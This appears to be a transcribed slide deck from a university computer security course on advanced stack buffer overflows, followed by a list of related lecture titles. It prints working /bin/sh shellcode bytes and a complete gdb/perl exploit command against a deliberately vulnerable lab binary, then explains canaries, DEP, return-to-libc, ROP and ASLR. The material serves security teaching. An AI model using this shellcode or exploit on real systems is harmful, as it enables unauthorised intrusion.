Advanced Buffer Overflow
|
|
- Sherilyn Sherman
- 6 years ago
- Views:
Transcription
1 Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. Computer Security A.Y. 2016/2017 Department of Electrical and Electronic Engineering University of Cagliari, Italy
2 Contents Introduction Advanced Attacks Analyzing Vulnerable Functions Advanced Exploiting Shellcode Complete Attack Countermeasures And Advanced Attacks Canaries DEP Return Oriented Programming and ASLR 10K Students Challenge 2
3 Introduction 3
4 Introduction Advanced Attacks In the previous lectures, we introduced the basics of reverse engineering and buffer overflow However, there was nothing particularly «dangerous» for the security of the system In this lecture, you will see how buffer overflow can be extremely dangerous You will violate the security of a system We also see the prominent defense techniques 4
5 Challenge! Open the file called «vulnerable» Try to execute it The program needs an argument! However, it doesn t seem to influence the behavior of the program The program itself, thought, tells you that it s vulnerable J 5
6 First Analyses As usual, the first step is disassembling the executable to look for interesting functions Sadly, this file does not contain other user-implemented functions apart from main! Let s analyze main to retrieve called library functions printf strcpy puts The fact that strcpy is there is a big problem! In fact, such function is potentially vulnerable There are also conditional jumps cmpl is essentially equal to cmp (we won t provide more details) jg jumps basing on the results of cmpl if the result is greater than zero, jumps to the destination offset 6
7 Analysis of main (First Part) d <main>: d: push %ebp e: mov %esp,%ebp : and $0xfffffff0,%esp : sub $0x410,%esp : cmpl $0x1,0x8(%ebp) d: jg 80484a2 <main+0x25> f: movl $0x ,(%esp) : call b: mov $0x0,%eax 80484a0: jmp 80484cb <main+0x4e> Allocates space for locals (1040 bytes + alignment) Compares an argument of main with the value 1. Note how the arguments of main are above ebp. The parameters of main are, usually, int argc, char** argv. In this case, the argc value is compared to 1. Hence, if the number of arguments is greater than 1, jumps to 80484A2 (remember that the name of the program is also an argument ) If the comparison fails (i.e., if the program receives less than 2 arguments), the program prints to the stdout and quits by going to 80484cb 7
8 Analysis of main (Second Part) 80484a2: mov 0xc(%ebp),%eax 80484a5: add $0x4,%eax 80484a8: mov (%eax),%eax 80484aa: mov %eax,0x4(%esp) 80484ae: lea 0x10(%esp),%eax 80484b2: mov %eax,(%esp) 80484b5: call The first 4 instructions loads (4 bytes above esp) the address of the array that is passed as SECOND parameter to strcpy. The eax register receives the address that are 16 bytes above esp (0x10), i.e., the address of the destination array (which is the FIRST parameter of strcpy see below) Loads the first parameter of strcpy (i.e., the value eax) to the location pointed by esp and calls strcpy. Hence, strcpy(buf, argv[1]). buf is pointed by esp, whilst the address of argv[1] is stored on esp ba: movl $0x804857c,(%esp) 80484c1: call <puts@plt> 80484c6: mov $0x0,%eax 80484cb: leave 80484cc: ret 80484cd: xchg %ax,%ax 80484cf: nop Loads the address of the string that will be used as parameter of puts and completes the execution 8
9 Thus What did we understand from the two previous slides? The program performs the following: It must receive an argument apart from the name of the program (otherwise it quits) It statically allocates a lot of memory in the main stackframe (a local variable will be stored main stackframe It calls a function that copies the received argument to a local variable This argument is an array (look how much space is allocated in memory!) The bytes are copied with a strcpy Which does not perform a control of the size of the array Thus, our program is potentially vulnerable 9
10 Advanced Exploiting 10
11 Attack Procedure The technique is the same that we saw in the previous lecture We fill the buffer (the local variable of main) Until we reach the memory location pointed by ebp Then, the attacker overwrites with a chosen address the return address that is located at ebp+4 The problem now is: which address shall we use? We cannot access other functions now (nor we are interested in doing so) Let s see a more effective attack! We will directly inject a code that performs an attack! 11
12 Attack Procedure (2) The attack strategy is therefore a bit different We fill the buffer (the local variable main) with a code that is specifically written to perform an attack The code must be injected so that the buffer is totally filled, and IT MUST STOP RIGHT BEFORE THE RETURN ADDRESS (it should NOT overwrite EBP+4) The return address is overwritten with the starting address of the attack code If everything works the code is executed! If the attack code opens a shell, it is usually called shellcode 12
13 Shellcode A shellcode is, like the name itself says, a sequence of instructions that lead to opening a shell By running shell it is possible to take control of the attacked system (if this is done with root permissions)! Such shell can be also open in a remote system Such code is usually injected as bytes that, are translated to instructions during the execution There are many ways (hence, multiple shellcodes) to generate a shell, depending on: The operating system The executable/processor architecture The fact that the shell is remote or not etc. 13
14 Part of a Shellcode (Example) "\x31\xc0" /* xor %eax,%eax */ "\xb0\x01" /* mov $0x1,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\xcd\x80"; /* int $0x80 */ sys_exit(0) "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" 14
15 Buffer Composition A first structure of the buffer can be described as follows: Put some random data (size = n) Add the shellcode (size = b) Add other data (size = d MUST OVERWRITE BOTH THE ALIGNMENT DATA AND EBP) We must cover all the space till the return address (ebp+4) In our case, (In our case, the array starts from ebp-0x410+ 0x10)+Alignment = 1024 byte + Alignment How much alignment do we have? To find out: With gdb, add a breakpoint right after and $0xfffffff0,%esp Alignment = ebp esp in that breakpoint! (In our case, 8 byte) Hence: (alignment) = 1032 byte Add other 4 byte to cover EBP and other 4 for the return address -> 1040 byte in total! However, this does NOT work The exact address of the shellcode in memory might be not be known in advance You are not sure about the correctness of the return address 15
16 NOP Sled We do not need to know where the shellcode exactly starts We can point to a random point of the buffer before the shellcode starts, but these bytes should ALL be NOP instructions, represented by the \x90 byte This technique is called NOP sled When you reach a sequence of NOP, the processor executes these instructions (resulting in doing nothing) And reaches the shellcode! The best way to perform the attack is, therefore: Fill the whole buffer with NOP (hence with \x90 bytes), leaving space only for the shellcode and the return address Add shellcode Add the return address We will use a 45 byte shellcode. Since we have to put 1040 bytes in total we will have: 991 byte NOP + 45 byte Shellcode + 4 bytes of return address 16
17 Finalizing the Attack We will use GDB to perform the attack (we will see why later on) Gdb must be executed with a parameter (our attack) gdb args./vulnerabile ARGUMENT Careful to the order of commands! We need a perl script again To pass it to gdb, we have to use the $(..script ) notation We will have the usual combination of print as script As random buffer address, we choose 0xbffff048 (obviously, you can pick up another one) Remember little endianness! We use as shellcode: "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0 b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xc d\x80\xe8\xdc\xff\xff\xff/bin/sh" 17
18 Complete Attack gdb --args./vulnerabile $( perl e print \x90 x991; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb 0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd 8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh ; print \x48\xf0\xff\xbf ) 18
19 Defense Strategies Even if very powerful, it s possible to defend against this attack Can be easily detected The application has not been compiled with the «usual» procedure The source has been compiled with these flags gcc fno-stack-protector z execstack o vulnerable vulnerable.c By not using them, the attack would not work Besides, this attack would not work outside gdb Let s see some of the most important attack techniques: Canaries DEP ASLR 19
20 Countermeasures and Advanced Attacks 20
21 Canaries Canaries are values (typically of 4 bytes that are put between the saved frame pointer and the locals of a function When a stack overflow is performed, we overwrite these values If this happens, The program is immediately stopped! 21
22 Types of Canaries Three types Terminator Random Random XOR Terminator exploits the fact that a canary contains a terminator character The terminator character stops strcpy (so you cannot inject it) But we cannot overwrite it, as the protection makes the program stop Can be still bypassed Random sets the canary to a random value, which is checked at runtime There are some performances drawbacks Random XOR further complicates the generation of the random value 22
23 DEP Acronym for Data Execution Prevention Exploits the fact that a memory location that can be written (hence, with flag W) cannot be also executed We remove the execution flag from the written part of the stack Therefore, our exploit would not work! We write data on the stack And we cannot execute them! Is it possible to bypass this? 23
24 Return-To-Libc With DEP you cannot run the code you injected into the stack But what happens if you manage to «reconstruct» a shellcode during the execution of the program? The key idea is: what cannot we avoid to execute? A possible answer is given by library functions Also called libc functions Example: system(), exit(), execl() Key idea: constructing an artificial stack frame by injecting the address of the library function, as well as its parameters and return address You can also chain these stackframes to build a sequence of system calls! 24
25 Return To Libc Artificial Stack The key idea is that we overwrite the return address with the one of a library function call (in this case, system, which takes the /bin/sh parameter as input). However, to return to a function that uses parameters, we have to inject: A)The address of System, B) A DUMMY return address, C) The parameter of System This is because the system function is invoked without a call instruction, so no return address will be added. After system is called, its parameter should stay at old EBP + 8! «/bin/sh» DUMMY Return System Address Random Data Before System is called «/bin/sh» DUMMY Return OLD EBP Random Data After System Is called 25
26 Return Oriented Programming It s the evolution of return-to-libc Instead of using system functions, we use pieces of code (also taken from library functions) which all end up with pop and ret instructions (which allow to control esp to apply what we saw in the previous slide to multiple functions) The code is legitimate, as it is currently executed by the program! If you manage to combine multiple pieces of code (called ROPGadgets) you could create a custom shellcode! This completely bypasses DEP One of the most advanced techniques to attack 26
27 Return Oriented Programming - Example -- ret ret &gadget3 &gadget2 &gadget1 27
28 ASLR A ROP-based attack can be stopped with ASLR Address Space Layout Randomization To find ROPGadgets, it is necessary to know their position in memory This techniques randomizes the position of the stack, heap and library functions In this way, the attacker could not easily retrieve the required information from the stack! Not invincible, but a very strong protection! 28
29 10K Students Challenge Ensemble of lectures that teach students the basics of computer security and binary analysis Goal: teaching security to students all over Europe Sponsored by Vrije Universiteit Amsterdam A lot of European universities joined the project In the official website you will find challenges that are similar (but harder) to the ones we saw in this course There are also YouTube videos Videos are in English, explained by prof. Herbert Bos You can find the material on 29
30 WARGAMES! Really interested in reverse engineering? You can improve your skills with war games Hacking games where you have to exploit more and more complex vulnerabilities to go to next levels There are many wargames related to various vulnerabilities A very popular one for reverse engineering is For every challenge you win, you can put your name to a public repository of winners! Use yourname@pralabinfosec17 30
Advanced Buffer Overflow
Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2017/2018 Department of Electrical and Electronic Engineering
More informationUniversità Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
More informationbuffer overflow exploitation
buffer overflow exploitation Samuele Andreoli, Nicolò Fornari, Giuseppe Vitto May 11, 2016 University of Trento Introduction 1 introduction A Buffer Overflow is an anomaly where a program, while writing
More informationLecture 08 Control-flow Hijacking Defenses
Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation
More informationSecurity Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40
Security Workshop HTS LSE Team EPITA 2018 February 3rd, 2016 1 / 40 Introduction What is this talk about? Presentation of some basic memory corruption bugs Presentation of some simple protections Writing
More informationCSC 591 Systems Attacks and Defenses Return-into-libc & ROP
CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD
More informationCSE 127: Computer Security. Memory Integrity. Kirill Levchenko
CSE 127: Computer Security Memory Integrity Kirill Levchenko November 18, 2014 Stack Buffer Overflow Stack buffer overflow: writing past end of a stackallocated buffer Also called stack smashing One of
More information2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks
Runtime attacks are major threats to today's applications Control-flow of an application is compromised at runtime Typically, runtime attacks include injection of malicious code Reasons for runtime attacks
More informationPractical Malware Analysis
Practical Malware Analysis Ch 4: A Crash Course in x86 Disassembly Revised 1-16-7 Basic Techniques Basic static analysis Looks at malware from the outside Basic dynamic analysis Only shows you how the
More informationReturn-orientated Programming
Return-orientated Programming or The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) Hovav Shacham, CCS '07 Return-Oriented oriented Programming programming
More informationThe Geometry of Innocent Flesh on the Bone
The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop
More information18-600: Recitation #4 Exploits
18-600: Recitation #4 Exploits 20th September 2016 Agenda More x86-64 assembly Buffer Overflow Attack Return Oriented Programming Attack 3 Recap: x86-64: Register Conventions Arguments passed in registers:
More information18-600: Recitation #4 Exploits (Attack Lab)
18-600: Recitation #4 Exploits (Attack Lab) September 19th, 2017 Announcements Some students have triggered the bomb multiple times Use breakpoints for explode_bomb() Attack lab will be released on Sep.
More informationAbstraction Recovery for Scalable Static Binary Analysis
Abstraction Recovery for Scalable Static Binary Analysis Edward J. Schwartz Software Engineering Institute Carnegie Mellon University 1 The Gap Between Binary and Source Code push mov sub movl jmp mov
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 2 Question 1 Software Vulnerabilities (15 min) For the following code, assume an attacker can control the value of basket passed into eval basket.
More informationLecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller
Lecture 10 Return-oriented programming Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller ROP Overview Idea: We forge shellcode out of existing application
More informationBetriebssysteme und Sicherheit Sicherheit. Buffer Overflows
Betriebssysteme und Sicherheit Sicherheit Buffer Overflows Software Vulnerabilities Implementation error Input validation Attacker-supplied input can lead to Corruption Code execution... Even remote exploitation
More informationSoftware Security II: Memory Errors - Attacks & Defenses
1 Software Security II: Memory Errors - Attacks & Defenses Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab1 Writeup 3 Buffer overflow Out-of-bound memory writes (mostly sequential) Allow
More information20: Exploits and Containment
20: Exploits and Containment Mark Handley Andrea Bittau What is an exploit? Programs contain bugs. These bugs could have security implications (vulnerabilities) An exploit is a tool which exploits a vulnerability
More informationWriting Exploits. Nethemba s.r.o.
Writing Exploits Nethemba s.r.o. norbert.szetei@nethemba.com Motivation Basic code injection W^X (DEP), ASLR, Canary (Armoring) Return Oriented Programming (ROP) Tools of the Trade Metasploit A Brief History
More informationBuffer Overflow Attack (AskCypert CLaaS)
Buffer Overflow Attack (AskCypert CLaaS) ---------------------- BufferOverflow.c code 1. int main(int arg c, char** argv) 2. { 3. char name[64]; 4. printf( Addr;%p\n, name); 5. strcpy(name, argv[1]); 6.
More informationCSC 405 Computer Security Stack Canaries & ASLR
CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses
More informationCNIT 127: Exploit Development. Ch 1: Before you begin. Updated
CNIT 127: Exploit Development Ch 1: Before you begin Updated 1-14-16 Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend, such as Denial
More informationBUFFER OVERFLOW DEFENSES & COUNTERMEASURES
BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess
More informationIntroduction to Operating Systems Prof. Chester Rebeiro Department of Computer Science and Engineering Indian Institute of Technology, Madras
Introduction to Operating Systems Prof. Chester Rebeiro Department of Computer Science and Engineering Indian Institute of Technology, Madras Week 08 Lecture 38 Preventing Buffer Overflow Attacks Hello.
More informationCMPSC 497 Buffer Overflow Vulnerabilities
Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Buffer Overflow
More informationThis time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask
This time We will continue Buffer overflows By looking at Overflow Defenses and other memory safety vulnerabilities Everything you ve always wanted to know about gdb but were too afraid to ask Overflow
More informationBeyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed
More informationCSE 361S Intro to Systems Software Lab Assignment #4
Due: Thursday, October 23, 2008. CSE 361S Intro to Systems Software Lab Assignment #4 In this lab, you will mount a buffer overflow attack on your own program. As stated in class, we do not condone using
More informationBuffer Overflow Attack
Buffer Overflow Attack What every applicant for the hacker should know about the foundation of buffer overflow attacks By (Dalgona@wowhacker.org) Email: zinwon@gmail.com 2005 9 5 Abstract Buffer overflow.
More informationBuffer Overflow Attacks
CS- Spring Buffer Overflow Attacks Computer Systems..-, CS- Spring Hacking Roots in phone phreaking White Hat vs Gray Hat vs Black Hat Over % of Modern Software Development is Black Hat! Tip the balance:
More informationBiography. Background
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com
More informationLecture 10 Code Reuse
Lecture 10 Code Reuse Computer and Network Security 4th of December 2017 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 10, Code Reuse 1/23 Defense Mechanisms static & dynamic analysis
More informationReturn oriented programming
Return oriented programming TOOR - Computer Security Hallgrímur H. Gunnarsson Reykjavík University 2012-05-04 Introduction Many countermeasures have been introduced to foil EIP hijacking: W X: Prevent
More informationBuffer Overflow Vulnerability
Buffer Overflow Vulnerability 1 Buffer Overflow Vulnerability Copyright c 2006 2014 Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from the US National
More informationBinary Analysis and Reverse Engineering
Pattern Recognition and Applications Lab Binary Analysis and Reverse Engineering Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2017/2018 Department of Electrical and Electronic
More informationFrom Over ow to Shell
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail:
More informationExercise 6: Buffer Overflow and return-into-libc Attacks
Technische Universität Darmstadt Fachbereich Informatik System Security Lab Prof. Dr.-Ing. Ahmad-Reza Sadeghi M.Sc. David Gens Exercise 6: Buffer Overflow and return-into-libc Attacks Course Secure, Trusted
More informationCountermeasures in Modern Operating Systems. Yves Younan, Vulnerability Research Team (VRT)
Countermeasures in Modern Operating Systems Yves Younan, Vulnerability Research Team (VRT) Introduction Programs in C/C++: memory error vulnerabilities Countermeasures (mitigations): make exploitation
More informationidkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.
idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming
More informationCS 392/681 Lab 6 Experiencing Buffer Overflows and Format String Vulnerabilities
CS 392/681 Lab 6 Experiencing Buffer Overflows and Format String Vulnerabilities Given: November 13, 2003 Due: November 20, 2003 1 Motivation Buffer overflows and format string vulnerabilities are widespread
More informationIntroduction to Computer Systems , fall th Lecture, Sep. 28 th
Introduction to Computer Systems 15 213, fall 2009 9 th Lecture, Sep. 28 th Instructors: Majd Sakr and Khaled Harras Last Time: Structures struct rec { int i; int a[3]; int *p; }; Memory Layout i a p 0
More informationINTRODUCTION TO EXPLOIT DEVELOPMENT
INTRODUCTION TO EXPLOIT DEVELOPMENT Nathan Ritchey and Michael Tucker Who Am I (Nathan Ritchey) Have Bachelors in Computer Science Member of CSG Working on Masters with focus on Information Assurance Some
More informationCSC 405 Computer Security Shellcode
CSC 405 Computer Security Shellcode Alexandros Kapravelos akaprav@ncsu.edu Attack plan Attack code Vulnerable code xor ebx, ebx xor eax, eax mov ebx,edi mov eax,edx sub eax,0x388 Vulnerable code xor ebx,
More informationAdvanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2
Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2 Clemens Hlauschek, Christian Schanes INSO Industrial Software Institute of Information Systems Engineering Faculty of
More informationBuffer Overflow Attack
Chapter 4 This is a sample chapter in the book titled "Computer Security: A Hands-on Approach" authored by Wenliang Du. Buffer Overflow Attack From Morris worm in 1988, Code Red worm in 2001, SQL Slammer
More informationSoftware Vulnerabilities August 31, 2011 / CS261 Computer Security
Software Vulnerabilities August 31, 2011 / CS261 Computer Security Software Vulnerabilities...1 Review paper discussion...2 Trampolining...2 Heap smashing...2 malloc/free...2 Double freeing...4 Defenses...5
More informationCS 161 Computer Security
Paxson Spring 2011 CS 161 Computer Security Discussion 1 January 26, 2011 Question 1 Buffer Overflow Mitigations Buffer overflow mitigations generally fall into two categories: (i) eliminating the cause
More informationCSE 509: Computer Security
CSE 509: Computer Security Date: 2.16.2009 BUFFER OVERFLOWS: input data Server running a daemon Attacker Code The attacker sends data to the daemon process running at the server side and could thus trigger
More informationExploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it
Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier
More informationCSC 2400: Computing Systems. X86 Assembly: Function Calls
CSC 24: Computing Systems X86 Assembly: Function Calls 1 Lecture Goals Challenges of supporting functions Providing information for the called function Function arguments and local variables Allowing the
More informationStack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta
1 Stack Vulnerabilities CS4379/5375 System Security Assurance Dr. Jaime C. Acosta Part 1 2 3 An Old, yet Still Valid Vulnerability Buffer/Stack Overflow ESP Unknown Data (unused) Unknown Data (unused)
More informationLecture Embedded System Security A. R. Darmstadt, Runtime Attacks
2 ARM stands for Advanced RISC Machine Application area: Embedded systems Mobile phones, smartphones (Apple iphone, Google Android), music players, tablets, and some netbooks Advantage: Low power consumption
More informationCS , Fall 2004 Exam 1
Andrew login ID: Full Name: CS 15-213, Fall 2004 Exam 1 Tuesday October 12, 2004 Instructions: Make sure that your exam is not missing any sheets, then write your full name and Andrew login ID on the front.
More informationBasic Buffer Overflows
Operating Systems Security Basic Buffer Overflows (Stack Smashing) Computer Security & OS lab. Cho, Seong-je ( 조성제 ) Fall, 2018 sjcho at dankook.ac.kr Chapter 10 Buffer Overflow 2 Contents Virtual Memory
More informationIntroduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins
Introduction to Reverse Engineering Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins Reverse Engineering (of Software) What is it? What is it for? Binary exploitation (the cool
More informationCSE 127 Computer Security
CSE 127 Computer Security Stefan Savage, Fall 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on the
More informationThe first Secure Programming Laboratory will be today! 3pm-6pm in Forrest Hill labs 1.B31, 1.B32.
Lab session this afternoon Memory corruption attacks Secure Programming Lecture 6: Memory Corruption IV (Countermeasures) David Aspinall, Informatics @ Edinburgh 2nd February 2016 The first Secure Programming
More informationLecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017
Lecture 09 Code reuse attacks Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Last time No good reason for stack/heap/static data to be executable No good reason for code to be writable
More informationCPSC 213. Introduction to Computer Systems. Procedures and the Stack. Unit 1e
CPSC 213 Introduction to Computer Systems Unit 1e Procedures and the Stack 1 Readings for Next 3 Lectures Textbook Procedures - 3.7 Out-of-Bounds Memory References and Buffer Overflow - 3.12 2 Local Variables
More informationBuffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts
This time We will begin our 1st section: Software Security By investigating Buffer overflows and other memory safety vulnerabilities History Memory layouts Buffer overflow fundamentals Software security
More informationSungkyunkwan University
November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? July, 1999 Microsoft launches MSN
More informationLab 2: Buffer Overflows
Department of Computer Science: Cyber Security Practice Lab 2: Buffer Overflows Introduction In this lab, you will learn how buffer overflows and other memory vulnerabilities are used to takeover vulnerable
More informationCSE 127 Computer Security
CSE 127 Computer Security Alex Gantman, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on
More informationSecure Programming Lecture 6: Memory Corruption IV (Countermeasures)
Secure Programming Lecture 6: Memory Corruption IV (Countermeasures) David Aspinall, Informatics @ Edinburgh 2nd February 2016 Outline Announcement Recap Containment and curtailment Tamper detection Memory
More informationString Oriented Programming Exploring Format String Attacks. Mathias Payer
String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:
More informationOutline. Format string attack layout. Null pointer dereference
CSci 5271 Introduction to Computer Security Day 5: Low-level defenses and counterattacks Stephen McCamant University of Minnesota, Computer Science & Engineering Null pointer dereference Format string
More informationProject 4: Application Security
CS461/ECE422 October 23, 2015 Computer Security I Project 4: Application Security Project 4: Application Security This project is split into two parts, with the first checkpoint due on Friday, October
More informationSoftware Security (cont.): Defenses, Adv. Attacks, & More
CSE 484 / CSE M 584 (Autumn 2011) Software Security (cont.): Defenses, Adv. Attacks, & More Daniel Halperin Tadayoshi Kohno Thanks to Dan Boneh, Dieter Gollmann, John Manferdelli, John Mitchell, Vitaly
More informationProject 1 Notes and Demo
Project 1 Notes and Demo Overview You ll be given the source code for 7 short buggy programs (target[1-7].c). These programs will be installed with setuid root Your job is to write exploits (sploit[1-7].c)
More informationLab 10: Introduction to x86 Assembly
CS342 Computer Security Handout # 8 Prof. Lyn Turbak Wednesday, Nov. 07, 2012 Wellesley College Revised Nov. 09, 2012 Lab 10: Introduction to x86 Assembly Revisions: Nov. 9 The sos O3.s file on p. 10 was
More informationIs stack overflow still a problem?
Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains
More informationCSE 127 Computer Security
CSE 127 Computer Security Stefan Savage, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on
More informationMemory Safety (cont d) Software Security
Memory Safety (cont d) Software Security CS 161: Computer Security Prof. Raluca Ada Popa January 17, 2016 Some slides credit to David Wagner and Nick Weaver Announcements Discussion sections and office
More informationPart II Let s make it real
Part II Let s make it real Memory Layout of a Process In reality Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 : push %ebp 0x08048429 : %esp,%ebp
More informationWriting your first windows exploit in less than one hour
Writing your first windows exploit in less than one hour Klaus Gebeshuber klaus.gebeshuber@fh-joanneum.at http://www.fh-joanneum.at/ims AGENDA Workshop 10.00 13.00 Memory & stack basics, function calling
More informationRobust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin
CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April 16 th,
More informationSecurity and Privacy in Computer Systems. Lecture 5: Application Program Security
CS 645 Security and Privacy in Computer Systems Lecture 5: Application Program Security Buffer overflow exploits More effective buffer overflow attacks Preventing buffer overflow attacks Announcement Project
More informationInject malicious code Call any library functions Modify the original code
Inject malicious code Call any library functions Modify the original code 2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks 2 3 Sadeghi, Davi TU Darmstadt
More informationCS-220 Spring 2018 Test 2 Version Practice Apr. 23, Name:
CS-220 Spring 2018 Test 2 Version Practice Apr. 23, 2018 Name: 1. (10 points) For the following, Check T if the statement is true, the F if the statement is false. (a) T F : The main difference between
More informationSecure Programming Lecture 3: Memory Corruption I (Stack Overflows)
Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) David Aspinall, Informatics @ Edinburgh 24th January 2017 Outline Roadmap Memory corruption vulnerabilities Instant Languages and Runtimes
More informationCSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko
CSE 127: Computer Security Control Flow Hijacking Kirill Levchenko October 17, 2017 Control Flow Hijacking Defenses Avoid unsafe functions Stack canary Separate control stack Address Space Layout Randomization
More informationBuffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform
Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform David Litchfield [davidl@ngssoftware.com] 30 th September 2005 An NGSSoftware Insight Security
More informationBuffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to
CPSC 8810 Fall 2018 Lab 1 1 Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through email to lcheng2@clemson.edu Copyright c 2006-2014 Wenliang Du, Syracuse
More informationHacking Blind BROP. Presented by: Brooke Stinnett. Article written by: Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazie`res, Dan Boneh
Hacking Blind BROP Presented by: Brooke Stinnett Article written by: Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazie`res, Dan Boneh Overview Objectives Introduction to BROP ROP recap BROP key phases
More informationSmashing the Buffer. Miroslav Štampar
Smashing the Buffer Miroslav Štampar (mstampar@zsis.hr) Summary BSidesVienna 2014, Vienna (Austria) November 22nd, 2014 2 Buffer overflow (a.k.a.) Buffer overrun An anomaly where a program, while writing
More informationShell Code For Beginners
Shell Code For Beginners Beenu Arora Site: www.beenuarora.com Email: beenudel1986@gmail.com ################################################################ #.. # # _/ \ _ \ _/ # # / \ \\ \ / // \/ /_\
More informationMachine-Level Programming V: Buffer overflow
Carnegie Mellon Machine-Level Programming V: Buffer overflow Slides adapted from Bryant and O Hallaron Bryant and O Hallaron, Computer Systems: A Programmer s Perspective, Third Edition 1 Recall: Memory
More informationQ: Exploit Hardening Made Easy
